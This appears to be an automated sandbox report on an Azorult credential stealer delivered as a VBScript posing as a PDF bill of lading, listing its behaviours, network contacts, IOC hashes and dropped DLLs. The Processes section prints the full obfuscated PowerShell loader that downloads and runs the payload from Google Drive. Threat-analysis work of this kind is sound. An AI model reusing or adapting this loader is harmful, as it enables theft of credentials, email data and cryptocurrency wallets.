Analysis Overview
SHA256
1562364a3048ef8e00720e3bc0c6588ed7a4d8f560c5bdafa5b19503e159a8a8
Threat Level: Known bad
The file DRAFT BILL OF LADING.PDF.vbs was found to be: Known bad.
Malicious Activity Summary
Azorult
Blocklisted process makes network request
Loads dropped DLL
Reads local data of messenger clients
Checks computer location settings
Accesses cryptocurrency files/wallets, possible credential harvesting
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Delays execution with timeout.exe
outlook_win_path
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-12 07:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-12 07:14
Reported
2024-03-12 07:16
Platform
win7-20240221-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Azorult
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Reads local data of messenger clients
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2032 set thread context of 1420 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DRAFT BILL OF LADING.PDF.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Opposability='Reappreciation:\Hovedjgernes';Set-Content $Opposability 'Lrerkollegier';$Capistrate81=Test-Path $Opposability;if($Capistrate81){exit};function cangler ($Tankest){For($Vgtafgiften=4; $Vgtafgiften -lt $Tankest.Length-1; $Vgtafgiften+=5){$besudles=$besudles+$Tankest.'Substring'($Vgtafgiften, 1)};$besudles;}$Danbo=cangler ' venh Sdmt U.tt BurpCorasVene:Plan/ an/ Keid P.lr.igliPar.vIdeaeNica. .rug UntoEnfoo DetgGn,tlSuq eEpig.,legc DifoSkakm bse/NonsuForncAar,?Del,e,itcx VinpHvalo enr VittShea=Kol.dBlinoS,pewMultnKlasl SoioWisda credTop.&.elsi ProdB,se=tyg.1geocKstudVsunlSArthE VisKStikQStedOKejs0 Nato IncwCamagBekrG non0MoskzCompQ TroBTran7L.ekPHi,tqParajHe.rPtrkubChasAUnderUnfuN DowACharcLbes0 UncckultZProdUFlyvclnre ';$Fastlaast=cangler 'Pat,iJuleeR,ffxGa.g ';$Arbejdsrutinen = cangler ' Ans\ strs Bray,orrsBihew Ocho kytwSrbo6Stan4Clea\ T,rWStreiChoknSni,d acaoRadiwQat,sDi.oPKaleoHjerwEnnee aitrM niSIndbhBegye stolEftelP,pi\ ArsvOp,i1.kra. Ask0Fimr\Syrap en oM,liwAfgaeSt drRetssfolkh MoueBagglMe.il,ans.LdgaeUdspx No.eE.tr ';&($Fastlaast) (cangler 'Unim$ TypGBl kbPt raskrmkNonrkskrae ibonChri=Trop$ Sowe Infn.annv por:hallw CroiRen.nEma,dCrowiEncarha.n ') ;&($Fastlaast) (cangler ' Rid$ .ecASprir iltbC.nteSkn,jEk adGon sTradrFyldu ThatZiggi D,un S ieIntenSom.= esp$Ar.lG E.mbC,ataRa.ckEftekUsneeSonnnEnga+Chry$ S fAun,ermestb.elfeFootj MotdEbensC,lorSakru,jertk ali ,sknF,dneG ngn agn ') ;&($Fastlaast) (cangler 'Phot$ DisUIn knEksprMoiduA anpInsht R,duAnser Hjse J.edRo,i Geo =Stor R.di( Upp(Syfig TegwEthymRepoi.rif EufowConvi Udtn Zin3S.bm2afla_Fo.sp lar NyeoGeofcDilee L.ssTitasDip Indb-oberFFnom nreP K.nrC,nto Fdsc S.ieAlabsOpdasArmmI De,dBl,w=Vest$Stan{StadP ,leIKontDTakt} Del)Budd. rfsCNucao AudmFortmWkpraStern Sled B bL EvoiDrmmnSbehe Est)Skru S.il- FussTurbp KallOrkeiOrakt Sin Ef,[IcelcOmgah Dr aBifurApos]Blgc3 ost4Preb ');&($Fastlaast) (cangler 'Bi,l$B,ngAVower ModrUblooSs eg KalaDokutF leeQuar Spal=Ytta Pala$ DauU.egnnNatirBeneuSuccpUvirtD duu C.mrAarveFokud Psy[Brdr$ WalUunconTheorEr nuPt.rpTauttMoniuMindrObl.eNat dKvar. S ocUregoPreluAlpen Op tPe.i-Beko2Ov.r]Ches ');&($Fastlaast) (cangler 'Li h$Av,uLTe ma PhagBegreBiodrR.fifPneuoCr wrKvr,vLdgaa G nlFrugt Ovee UnirSkornSe aeVver=P ec(UndeTArs.e,horsskritSkem-RevaPLo iarevatXa thSynt Dist$RetaAProlrUdkmb Afve BanjAgardD.mbsHygrrE.ekuIndutJ.uriTrannVolteChonnSols)Ac,d Cho.-ProfA BrunFeltdChlo Rek(Bil,[.irmI.ungnStatt UfePAnaltManirAllo]Ch o:u.li:Grots L.eipartzProue Op. Inco-H,geeAn.oqPasc ,tri8Spl ) Spa ') ;if ($Lagerforvalterne) {&$Arbejdsrutinen $Arrogate;} else {;$Seawalls=cangler 'S,ndSH.motFortaQuadr UnctFler- T.mBKiteiLbskt usys.ektT UnarOscua,phinBukksCharf.nexeSkycrPals Lig -Ca,iSAdv,oTe,euOptirre,acFoure Pat Re,r$ecthDShugaHighnAmarbStagoH.ra T.mm- ActD ,ereSubss,ackt Sthikunon oniaF sktSo,diAnneogoodnEadi tilo$Al fG OvebImdeaSubskPrurkStereP ysn Dia ';&($Fastlaast) (cangler 'Daug$y.chGProtb ResaEn,okAntik ordeYog.nCh r=Aggl$,ypeeS.ednPri,vUnde:SociaConcpni spO sidSod,a tilt Upca Mus ') ;&($Fastlaast) (cangler 'AdviIIldlmUndep .utoB sgrO.lot The-MestMspi,oExotdSitauCarbl UnpeLath Co eB IndiAvi,tReprs Le,T .urr ubaDilenNeursSun,fAlaneB.lyrProt ') ;$Gbakken=$Gbakken+'\Arboureous.Whi';while (-not $Konversatietonsleksika) {&($Fastlaast) (cangler 'Stje$RejsKOscuoUnnenpolyvPat,eAtomrSabesJudia RehtHos iGineeappltForboIchtnPeris PerlBalle KrikLimos.adeiCordkSpilaGang=Do,s(UnsyTBoateScr sStortStou-,uggP FllaUbentKivehDomi B,o$SkabGKranb,aska ,rakHetekUs.seCentnCinc)Non, ') ;&($Fastlaast) $Seawalls;&($Fastlaast) (cangler 'TeleS evitRec,aHoerrAd itProc-ArguSBe,rlToveeF,gteFin.pAstr Excu5Hjti ');}&($Fastlaast) (cangler 'Squi$solbU FlanImbee arjxphartCr crM,shaCeravTiltaMyofgchona Tranvejrt evnlt,icy Wit P ov=Alau IlanGMarkeUntrtK,mm-NonzCEmuloBaadnUnsetL.pieTwisnNarrtRyde Fri,$An.lGdashbTu.taawe,k Glok peke trin Par ');&($Fastlaast) (cangler 'B.gg$TovfGS.ksa,ibifstalfSecrk Kony SataAsp.8H st4Sote euk=Fuld Har[Hi.pSArr,yTortsSn gtAfspeIr.emSbeu. Sj,C.lidoKohon Arav KipeB.ndr D ctUfor]Skaa:Knud: CypF EtyrUvurooverm upeB oua SttsIndveEnvi6 ili4RestSBrustUnprrBenhi Nonn.itog ,ke(Ane.$NocuUSolinsw,eeFriaxTetrtNoner.rosaB.pyvThe,a icgFo,oaColln G,ntArm.lPauly iss)Nokt ');&($Fastlaast) (cangler 'Scr,$R,teMPoseu kali ersr ArcbBroauEnvir.endnT an Resu= ato Col,[PrivSA.asyFalls SvmtTrameBailmF ag.Dr.gTTer.e TroxElastbleg. UryEPr enM,crc su,oPropdFngsiCompnIsotghumi] .in:Hugg:TripAvandSRombC,xymISascIHind.OptaGWeskeTitetTeknS.ejrtUnblrDiagiP ysnSadegAlmu(Citr$ InaG LapaForkfKrsef Chik estyFrogaFrik8Rows4 ,ab)Podd ');&($Fastlaast) (cangler ' Fl,$circSMilikReklnFlawhlatte DisdCheksPantpFreml BygeCountmisatDe,re Ldin imb=Fors$MythM ,ypuEctoim.dsrernabAstruToplrSvinnKonk.ReplsJagluWas.bUdt s A.ptFascr Prgi .atnCr.pgMyog(No.k3Atte2 Tit0 Uns7Diss0Burt9Asci, Ove3 Afl9Komm3Impe2Re,i3De,e) Enf ');&($Fastlaast) $Sknhedspletten;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Opposability='Reappreciation:\Hovedjgernes';Set-Content $Opposability 'Lrerkollegier';$Capistrate81=Test-Path $Opposability;if($Capistrate81){exit};function cangler ($Tankest){For($Vgtafgiften=4; $Vgtafgiften -lt $Tankest.Length-1; $Vgtafgiften+=5){$besudles=$besudles+$Tankest.'Substring'($Vgtafgiften, 1)};$besudles;}$Danbo=cangler ' venh Sdmt U.tt BurpCorasVene:Plan/ an/ Keid P.lr.igliPar.vIdeaeNica. .rug UntoEnfoo DetgGn,tlSuq eEpig.,legc DifoSkakm bse/NonsuForncAar,?Del,e,itcx VinpHvalo enr VittShea=Kol.dBlinoS,pewMultnKlasl SoioWisda credTop.&.elsi ProdB,se=tyg.1geocKstudVsunlSArthE VisKStikQStedOKejs0 Nato IncwCamagBekrG non0MoskzCompQ TroBTran7L.ekPHi,tqParajHe.rPtrkubChasAUnderUnfuN DowACharcLbes0 UncckultZProdUFlyvclnre ';$Fastlaast=cangler 'Pat,iJuleeR,ffxGa.g ';$Arbejdsrutinen = cangler ' Ans\ strs Bray,orrsBihew Ocho kytwSrbo6Stan4Clea\ T,rWStreiChoknSni,d acaoRadiwQat,sDi.oPKaleoHjerwEnnee aitrM niSIndbhBegye stolEftelP,pi\ ArsvOp,i1.kra. Ask0Fimr\Syrap en oM,liwAfgaeSt drRetssfolkh MoueBagglMe.il,ans.LdgaeUdspx No.eE.tr ';&($Fastlaast) (cangler 'Unim$ TypGBl kbPt raskrmkNonrkskrae ibonChri=Trop$ Sowe Infn.annv por:hallw CroiRen.nEma,dCrowiEncarha.n ') ;&($Fastlaast) (cangler ' Rid$ .ecASprir iltbC.nteSkn,jEk adGon sTradrFyldu ThatZiggi D,un S ieIntenSom.= esp$Ar.lG E.mbC,ataRa.ckEftekUsneeSonnnEnga+Chry$ S fAun,ermestb.elfeFootj MotdEbensC,lorSakru,jertk ali ,sknF,dneG ngn agn ') ;&($Fastlaast) (cangler 'Phot$ DisUIn knEksprMoiduA anpInsht R,duAnser Hjse J.edRo,i Geo =Stor R.di( Upp(Syfig TegwEthymRepoi.rif EufowConvi Udtn Zin3S.bm2afla_Fo.sp lar NyeoGeofcDilee L.ssTitasDip Indb-oberFFnom nreP K.nrC,nto Fdsc S.ieAlabsOpdasArmmI De,dBl,w=Vest$Stan{StadP ,leIKontDTakt} Del)Budd. rfsCNucao AudmFortmWkpraStern Sled B bL EvoiDrmmnSbehe Est)Skru S.il- FussTurbp KallOrkeiOrakt Sin Ef,[IcelcOmgah Dr aBifurApos]Blgc3 ost4Preb ');&($Fastlaast) (cangler 'Bi,l$B,ngAVower ModrUblooSs eg KalaDokutF leeQuar Spal=Ytta Pala$ DauU.egnnNatirBeneuSuccpUvirtD duu C.mrAarveFokud Psy[Brdr$ WalUunconTheorEr nuPt.rpTauttMoniuMindrObl.eNat dKvar. S ocUregoPreluAlpen Op tPe.i-Beko2Ov.r]Ches ');&($Fastlaast) (cangler 'Li h$Av,uLTe ma PhagBegreBiodrR.fifPneuoCr wrKvr,vLdgaa G nlFrugt Ovee UnirSkornSe aeVver=P ec(UndeTArs.e,horsskritSkem-RevaPLo iarevatXa thSynt Dist$RetaAProlrUdkmb Afve BanjAgardD.mbsHygrrE.ekuIndutJ.uriTrannVolteChonnSols)Ac,d Cho.-ProfA BrunFeltdChlo Rek(Bil,[.irmI.ungnStatt UfePAnaltManirAllo]Ch o:u.li:Grots L.eipartzProue Op. Inco-H,geeAn.oqPasc ,tri8Spl ) Spa ') ;if ($Lagerforvalterne) {&$Arbejdsrutinen $Arrogate;} else {;$Seawalls=cangler 'S,ndSH.motFortaQuadr UnctFler- T.mBKiteiLbskt usys.ektT UnarOscua,phinBukksCharf.nexeSkycrPals Lig -Ca,iSAdv,oTe,euOptirre,acFoure Pat Re,r$ecthDShugaHighnAmarbStagoH.ra T.mm- ActD ,ereSubss,ackt Sthikunon oniaF sktSo,diAnneogoodnEadi tilo$Al fG OvebImdeaSubskPrurkStereP ysn Dia ';&($Fastlaast) (cangler 'Daug$y.chGProtb ResaEn,okAntik ordeYog.nCh r=Aggl$,ypeeS.ednPri,vUnde:SociaConcpni spO sidSod,a tilt Upca Mus ') ;&($Fastlaast) (cangler 'AdviIIldlmUndep .utoB sgrO.lot The-MestMspi,oExotdSitauCarbl UnpeLath Co eB IndiAvi,tReprs Le,T .urr ubaDilenNeursSun,fAlaneB.lyrProt ') ;$Gbakken=$Gbakken+'\Arboureous.Whi';while (-not $Konversatietonsleksika) {&($Fastlaast) (cangler 'Stje$RejsKOscuoUnnenpolyvPat,eAtomrSabesJudia RehtHos iGineeappltForboIchtnPeris PerlBalle KrikLimos.adeiCordkSpilaGang=Do,s(UnsyTBoateScr sStortStou-,uggP FllaUbentKivehDomi B,o$SkabGKranb,aska ,rakHetekUs.seCentnCinc)Non, ') ;&($Fastlaast) $Seawalls;&($Fastlaast) (cangler 'TeleS evitRec,aHoerrAd itProc-ArguSBe,rlToveeF,gteFin.pAstr Excu5Hjti ');}&($Fastlaast) (cangler 'Squi$solbU FlanImbee arjxphartCr crM,shaCeravTiltaMyofgchona Tranvejrt evnlt,icy Wit P ov=Alau IlanGMarkeUntrtK,mm-NonzCEmuloBaadnUnsetL.pieTwisnNarrtRyde Fri,$An.lGdashbTu.taawe,k Glok peke trin Par ');&($Fastlaast) (cangler 'B.gg$TovfGS.ksa,ibifstalfSecrk Kony SataAsp.8H st4Sote euk=Fuld Har[Hi.pSArr,yTortsSn gtAfspeIr.emSbeu. Sj,C.lidoKohon Arav KipeB.ndr D ctUfor]Skaa:Knud: CypF EtyrUvurooverm upeB oua SttsIndveEnvi6 ili4RestSBrustUnprrBenhi Nonn.itog ,ke(Ane.$NocuUSolinsw,eeFriaxTetrtNoner.rosaB.pyvThe,a icgFo,oaColln G,ntArm.lPauly iss)Nokt ');&($Fastlaast) (cangler 'Scr,$R,teMPoseu kali ersr ArcbBroauEnvir.endnT an Resu= ato Col,[PrivSA.asyFalls SvmtTrameBailmF ag.Dr.gTTer.e TroxElastbleg. UryEPr enM,crc su,oPropdFngsiCompnIsotghumi] .in:Hugg:TripAvandSRombC,xymISascIHind.OptaGWeskeTitetTeknS.ejrtUnblrDiagiP ysnSadegAlmu(Citr$ InaG LapaForkfKrsef Chik estyFrogaFrik8Rows4 ,ab)Podd ');&($Fastlaast) (cangler ' Fl,$circSMilikReklnFlawhlatte DisdCheksPantpFreml BygeCountmisatDe,re Ldin imb=Fors$MythM ,ypuEctoim.dsrernabAstruToplrSvinnKonk.ReplsJagluWas.bUdt s A.ptFascr Prgi .atnCr.pgMyog(No.k3Atte2 Tit0 Uns7Diss0Burt9Asci, Ove3 Afl9Komm3Impe2Re,i3De,e) Enf ');&($Fastlaast) $Sknhedspletten;}"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "wab.exe"
C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| GB | 23.48.165.155:80 | repository.certum.pl | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | mhlc.shop | udp |
| US | 104.21.23.20:80 | mhlc.shop | tcp |
| US | 104.21.23.20:80 | mhlc.shop | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab141F.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar1422.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar162D.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/1960-124-0x000000001B670000-0x000000001B952000-memory.dmp
memory/1960-125-0x0000000001E70000-0x0000000001E78000-memory.dmp
memory/1960-126-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
memory/1960-127-0x0000000002B90000-0x0000000002C10000-memory.dmp
memory/1960-129-0x0000000002B90000-0x0000000002C10000-memory.dmp
memory/1960-128-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
memory/1960-130-0x0000000002B90000-0x0000000002C10000-memory.dmp
memory/1960-131-0x0000000002B90000-0x0000000002C10000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\429AI7V21ZIDY7Q1GU55.temp
| MD5 | 612becf302fa729bad03a170144f9061 |
| SHA1 | 908619fac8d68c9799c67dd7da0e7368ee3db8e2 |
| SHA256 | b7bfb4ce1df23206d78fa36486b1b9766480e5ad21ef7d1a69a37a1b24dd3d39 |
| SHA512 | 69f1bee3de7137dbd223a4a86ea00dbb7f008d8b13191b3009c10cf48bfcb19d411fb7c56457014ba406d500bb8f1d34830fe20c4b6cb13a399dbec3663f8f41 |
memory/2032-135-0x0000000001CF0000-0x0000000001D30000-memory.dmp
memory/2032-134-0x0000000073830000-0x0000000073DDB000-memory.dmp
memory/2032-136-0x0000000073830000-0x0000000073DDB000-memory.dmp
memory/2032-137-0x0000000001CF0000-0x0000000001D30000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 209fbb493f8f846b64fb13099d9f8f6b |
| SHA1 | 3c6497a1aa3594fa3fb49361be428fa71b5ac4c7 |
| SHA256 | 7db290c1772087d998734efbbaa0ed3d29c6396ab4f884aaa4603a4414c92317 |
| SHA512 | 3814aad11d8b904d9ca664d87b73ff6af99ce31fff3aa648a827ba73c5dd098d1f4cf3a98a9a334b625fc638ab2fb2b6f95ad86146a2180ab7a8b8d2fadccd1e |
memory/1960-149-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
memory/1960-150-0x0000000002B90000-0x0000000002C10000-memory.dmp
memory/1960-151-0x0000000002B90000-0x0000000002C10000-memory.dmp
memory/2032-153-0x0000000005720000-0x0000000005721000-memory.dmp
memory/2032-152-0x0000000006960000-0x000000000C523000-memory.dmp
memory/1960-154-0x0000000002B90000-0x0000000002C10000-memory.dmp
memory/2032-155-0x0000000073830000-0x0000000073DDB000-memory.dmp
memory/2032-156-0x0000000001CF0000-0x0000000001D30000-memory.dmp
memory/2032-158-0x0000000001CF0000-0x0000000001D30000-memory.dmp
memory/2032-157-0x0000000001CF0000-0x0000000001D30000-memory.dmp
memory/2032-159-0x0000000077740000-0x00000000778E9000-memory.dmp
memory/2032-160-0x0000000077930000-0x0000000077A06000-memory.dmp
memory/1420-163-0x0000000077740000-0x00000000778E9000-memory.dmp
memory/1420-164-0x0000000077966000-0x0000000077967000-memory.dmp
memory/1420-165-0x0000000077930000-0x0000000077A06000-memory.dmp
memory/1420-166-0x00000000003C0000-0x0000000001422000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6754ca5c5d145353b87269e980d54129 |
| SHA1 | d8bcde60c051ada64fe2bcadcb2e1b68cc18622d |
| SHA256 | 6a873929f5e698bcc52f422c7ba0b5b8a8405e0e2fd7aea484d8995d03ed74c1 |
| SHA512 | bdafc03a276238462bce3ab89a9bfa8be09c66bb28b6ad47f42395e4ba2ddbf96b96615ee27cc0fdb7cd6347c5e932eb4c7bb8faca27e5af3fdd03d2c337bd09 |
memory/1420-187-0x00000000003C0000-0x0000000001422000-memory.dmp
memory/1960-188-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
memory/1420-189-0x00000000003C0000-0x0000000001422000-memory.dmp
\Users\Admin\AppData\Local\Temp\99E8C950\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\99E8C950\mozglue.dll
| MD5 | 9e682f1eb98a9d41468fc3e50f907635 |
| SHA1 | 85e0ceca36f657ddf6547aa0744f0855a27527ee |
| SHA256 | 830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d |
| SHA512 | 230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed |
\Users\Admin\AppData\Local\Temp\99E8C950\nss3.dll
| MD5 | 556ea09421a0f74d31c4c0a89a70dc23 |
| SHA1 | f739ba9b548ee64b13eb434a3130406d23f836e3 |
| SHA256 | f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb |
| SHA512 | 2481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2 |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | aec2268601470050e62cb8066dd41a59 |
| SHA1 | 363ed259905442c4e3b89901bfd8a43b96bf25e4 |
| SHA256 | 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2 |
| SHA512 | 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | b52a0ca52c9c207874639b62b6082242 |
| SHA1 | 6fb845d6a82102ff74bd35f42a2844d8c450413b |
| SHA256 | a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0 |
| SHA512 | 18834d89376d703bd461edf7738eb723ad8d54cb92acc9b6f10cbb55d63db22c2a0f2f3067fe2cc6feb775db397030606608ff791a46bf048016a1333028d0a4 |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | ac290dad7cb4ca2d93516580452eda1c |
| SHA1 | fa949453557d0049d723f9615e4f390010520eda |
| SHA256 | c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382 |
| SHA512 | b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8 |
